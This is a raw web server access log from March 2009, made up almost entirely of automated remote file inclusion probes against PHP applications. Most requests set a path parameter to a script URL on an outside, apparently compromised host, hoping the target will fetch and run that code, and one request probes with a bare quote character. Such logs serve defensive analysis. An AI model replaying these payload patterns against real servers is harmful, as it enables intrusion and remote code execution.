87.241.44.41 - - [11/Mar/2009:11:50:37 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
87.241.44.41 - - [11/Mar/2009:11:50:37 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://usuarios.lycos.es/rOx/prc.gif?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
77.93.208.64 - - [11/Mar/2009:11:59:06 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:11:59:06 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:11:59:36 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:11:59:39 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:02:46 -0500] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:02:46 -0500] "GET //twindow_notice.php?shop_this_skin_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:02:57 -0500] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:02:57 -0500] "GET //twindow_notice.php?shop_this_skin_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.91.201.31 - - [11/Mar/2009:12:05:30 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:05:30 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:05:30 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:05:32 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:05:32 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:05:32 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:06:44 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:06:44 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:06:44 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:06 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:06 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:06 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:06 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:06 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:06 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:07:10 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:07:10 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:07:10 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
65.55.230.166 - - [11/Mar/2009:12:07:37 -0500] "GET /logs/access_log.1190851200 HTTP/1.1" 200 2262 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [11/Mar/2009:12:07:37 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 200 656 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
218.38.55.195 - - [11/Mar/2009:12:07:54 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:12:07:54 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:12:07:55 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:55 -0500] "GET /logs/access_log.1233619200//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:07:59 -0500] "GET /logs/access_log.1233619200//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:08:06 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:08:06 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:08:06 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:08:46 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:08:46 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:08:46 -0500] "GET /logs/access_log.1234656000//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.55.195 - - [11/Mar/2009:12:08:51 -0500] "GET /logs/access_log.1233619200//bbs/include/print_category.php?setup[use_category]=1&dir=http://2008.itcweb.co.uk/wp-content/themes/bt-evolution/evolution-plugins/similar-posts/languages/en/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
85.18.117.101 - - [11/Mar/2009:12:11:15 -0500] "GET /logs/access_log.1233619200//bbs/include/print_category.php?setup[use_category]=1&dir=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
77.93.208.64 - - [11/Mar/2009:12:12:48 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:12:12:49 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:12:13:01 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:12:13:02 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:12:13:49 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.17 - - [11/Mar/2009:12:13:52 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:14:35 -0500] "GET /logs//help.php?css_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:14:35 -0500] "GET /logs//help.php?css_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:14:35 -0500] "GET //help.php?css_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
165.194.27.141 - - [11/Mar/2009:12:14:35 -0500] "GET //help.php?css_path=http://www.champrond-en-gatine.org/sessions/errors.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
211.202.2.220 - - [11/Mar/2009:12:14:47 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:14:47 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:14:47 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:14:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:14:52 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:14:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:14:57 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [11/Mar/2009:12:15:03 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.12.13.152 - - [11/Mar/2009:12:16:34 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.lazar.ru/manager/processors/copyright.txt?%0D?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
81.12.13.152 - - [11/Mar/2009:12:16:34 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.lazar.ru/manager/processors/copyright.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
151.1.32.20 - - [11/Mar/2009:12:18:20 -0500] "GET /logs/errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
151.1.32.20 - - [11/Mar/2009:12:18:20 -0500] "GET /errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
61.63.90.81 - - [11/Mar/2009:12:18:36 -0500] "GET ///vwar/backup/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
61.63.90.81 - - [11/Mar/2009:12:18:36 -0500] "GET /logs///vwar/backup/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
151.1.32.20 - - [11/Mar/2009:12:18:43 -0500] "GET /logs/errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
151.1.32.20 - - [11/Mar/2009:12:18:43 -0500] "GET /errors.php?error=http://www.bibliotecas.uvmnet.edu/portico-uvm-out/components/com_login/idste.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
66.240.151.240 - - [11/Mar/2009:12:33:45 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://gugakedu.co.kr/kboard/image/id.txt?? HTTP/1.0" 404 312 "-""libwww-perl/5.53"
66.240.151.240 - - [11/Mar/2009:12:33:45 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION%5BSCRIPT_PATH%5D=http://gugakedu.co.kr/kboard/image/id.txt?? HTTP/1.0" 404 307 "-""libwww-perl/5.53"
77.91.201.31 - - [11/Mar/2009:12:36:55 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:36:55 -0500] "GET /logs/access_log.1232064000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:36:55 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:37:02 -0500] "GET /logs/access_log.1233619200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:37:51 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:37:51 -0500] "GET /logs/access_log.1230163200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:37:51 -0500] "GET /logs/access_log.1230595200//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
77.91.201.31 - - [11/Mar/2009:12:37:51 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.234.18.127 - - [11/Mar/2009:12:38:59 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
218.234.18.127 - - [11/Mar/2009:12:38:59 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
80.179.197.173 - - [11/Mar/2009:12:39:06 -0500] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=' HTTP/1.1" 404 324 "-""libwww-perl/5.808"
80.179.197.173 - - [11/Mar/2009:12:39:06 -0500] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=' HTTP/1.1" 404 319 "-""libwww-perl/5.808"
211.220.195.71 - - [11/Mar/2009:12:47:57 -0500] "GET //apboard/portal.php/add.php?APB_rp=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:12:47:57 -0500] "GET /logs//apboard/portal.php/add.php?APB_rp=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:12:47:57 -0500] "GET /logs/access_log.1230595200//apboard/portal.php/add.php?APB_rp=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:12:48:02 -0500] "GET /logs/access_log.1231286400//apboard/portal.php/add.php?APB_rp=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
61.62.162.42 - - [11/Mar/2009:12:48:48 -0500] "GET /logs/vwar/backup/errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:12:48:48 -0500] "GET /logs/vwar/backup/errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:12:48:48 -0500] "GET /vwar/backup/errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
61.62.162.42 - - [11/Mar/2009:12:48:48 -0500] "GET /vwar/backup/errors.php?error=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
202.190.198.160 - - [11/Mar/2009:12:51:13 -0500] "GET //main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
202.190.198.160 - - [11/Mar/2009:12:51:13 -0500] "GET /logs//main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
202.190.198.160 - - [11/Mar/2009:12:51:13 -0500] "GET /logs/access_log.1230422400//main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
202.190.198.160 - - [11/Mar/2009:12:54:12 -0500] "GET /logs/access_log.1234742400//main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.234.18.127 - - [11/Mar/2009:12:54:50 -0500] "GET /logs//?write.php?dir=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 200 181180 "-""libwww-perl/5.79"
218.234.18.127 - - [11/Mar/2009:12:54:51 -0500] "GET //?write.php?dir=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 200 3245 "-""libwww-perl/5.79"
211.220.195.71 - - [11/Mar/2009:12:55:15 -0500] "GET /logs/access_log.1225843200/vwar/backup/errors.php?error=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:12:55:15 -0500] "GET /vwar/backup/errors.php?error=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.220.195.71 - - [11/Mar/2009:12:55:15 -0500] "GET /logs/vwar/backup/errors.php?error=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
74.57.99.81 - - [11/Mar/2009:12:55:51 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:12:55:52 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
211.220.195.71 - - [11/Mar/2009:12:55:57 -0500] "GET /logs/access_log.1227744000/vwar/backup/errors.php?error=http://www.tickledpinkscentsations.com/images/f1.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.57.99.81 - - [11/Mar/2009:12:56:09 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
74.57.99.81 - - [11/Mar/2009:12:56:12 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
200.93.147.154 - - [11/Mar/2009:12:58:51 -0500] "GET //bbshop/admin/admin.php?_shop_path=http://www.geocities.com/jakaoke79/test.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
213.203.223.93 - - [11/Mar/2009:12:58:51 -0500] "GET //main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
213.203.223.93 - - [11/Mar/2009:12:58:51 -0500] "GET /logs//main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
213.203.223.93 - - [11/Mar/2009:12:58:51 -0500] "GET /logs/access_log.1230422400//main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.226.88.17 - - [11/Mar/2009:12:59:19 -0500] "GET /logs/errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:12:59:19 -0500] "GET /errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:12:59:38 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:12:59:38 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
77.93.208.64 - - [11/Mar/2009:12:59:55 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:12:59:55 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:13:00:48 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.93.208.64 - - [11/Mar/2009:13:00:48 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.roldanfsf.com/www/mambots/system/idc.jpg?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.203.223.93 - - [11/Mar/2009:13:00:59 -0500] "GET /logs/access_log.1234742400//main.php?_zb_path=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.240.151.240 - - [11/Mar/2009:13:03:39 -0500] "GET /logs//?write.php?dir=http://gugakedu.co.kr/kboard/image/id.txt?? HTTP/1.0" 200 180860 "-""libwww-perl/5.53"
66.240.151.240 - - [11/Mar/2009:13:03:45 -0500] "GET //?write.php?dir=http://gugakedu.co.kr/kboard/image/id.txt?? HTTP/1.0" 200 3233 "-""libwww-perl/5.53"
74.205.119.226 - - [11/Mar/2009:13:16:29 -0500] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:13:16:29 -0500] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.205.119.226 - - [11/Mar/2009:13:16:29 -0500] "GET /logs/access_log.1234224000/ncaster/admin/addons/archive/archive.php?adminfolder=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 350 "-""Mozilla/5.0"
207.226.88.17 - - [11/Mar/2009:13:18:12 -0500] "GET /logs/errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:13:18:12 -0500] "GET /errors.php?error=http://www.gosstroy.com/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.226.88.17 - - [11/Mar/2009:13:18:13 -0500] "GET /logs/errors.php?error=http://www.talveakadeemia.ee/2008/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
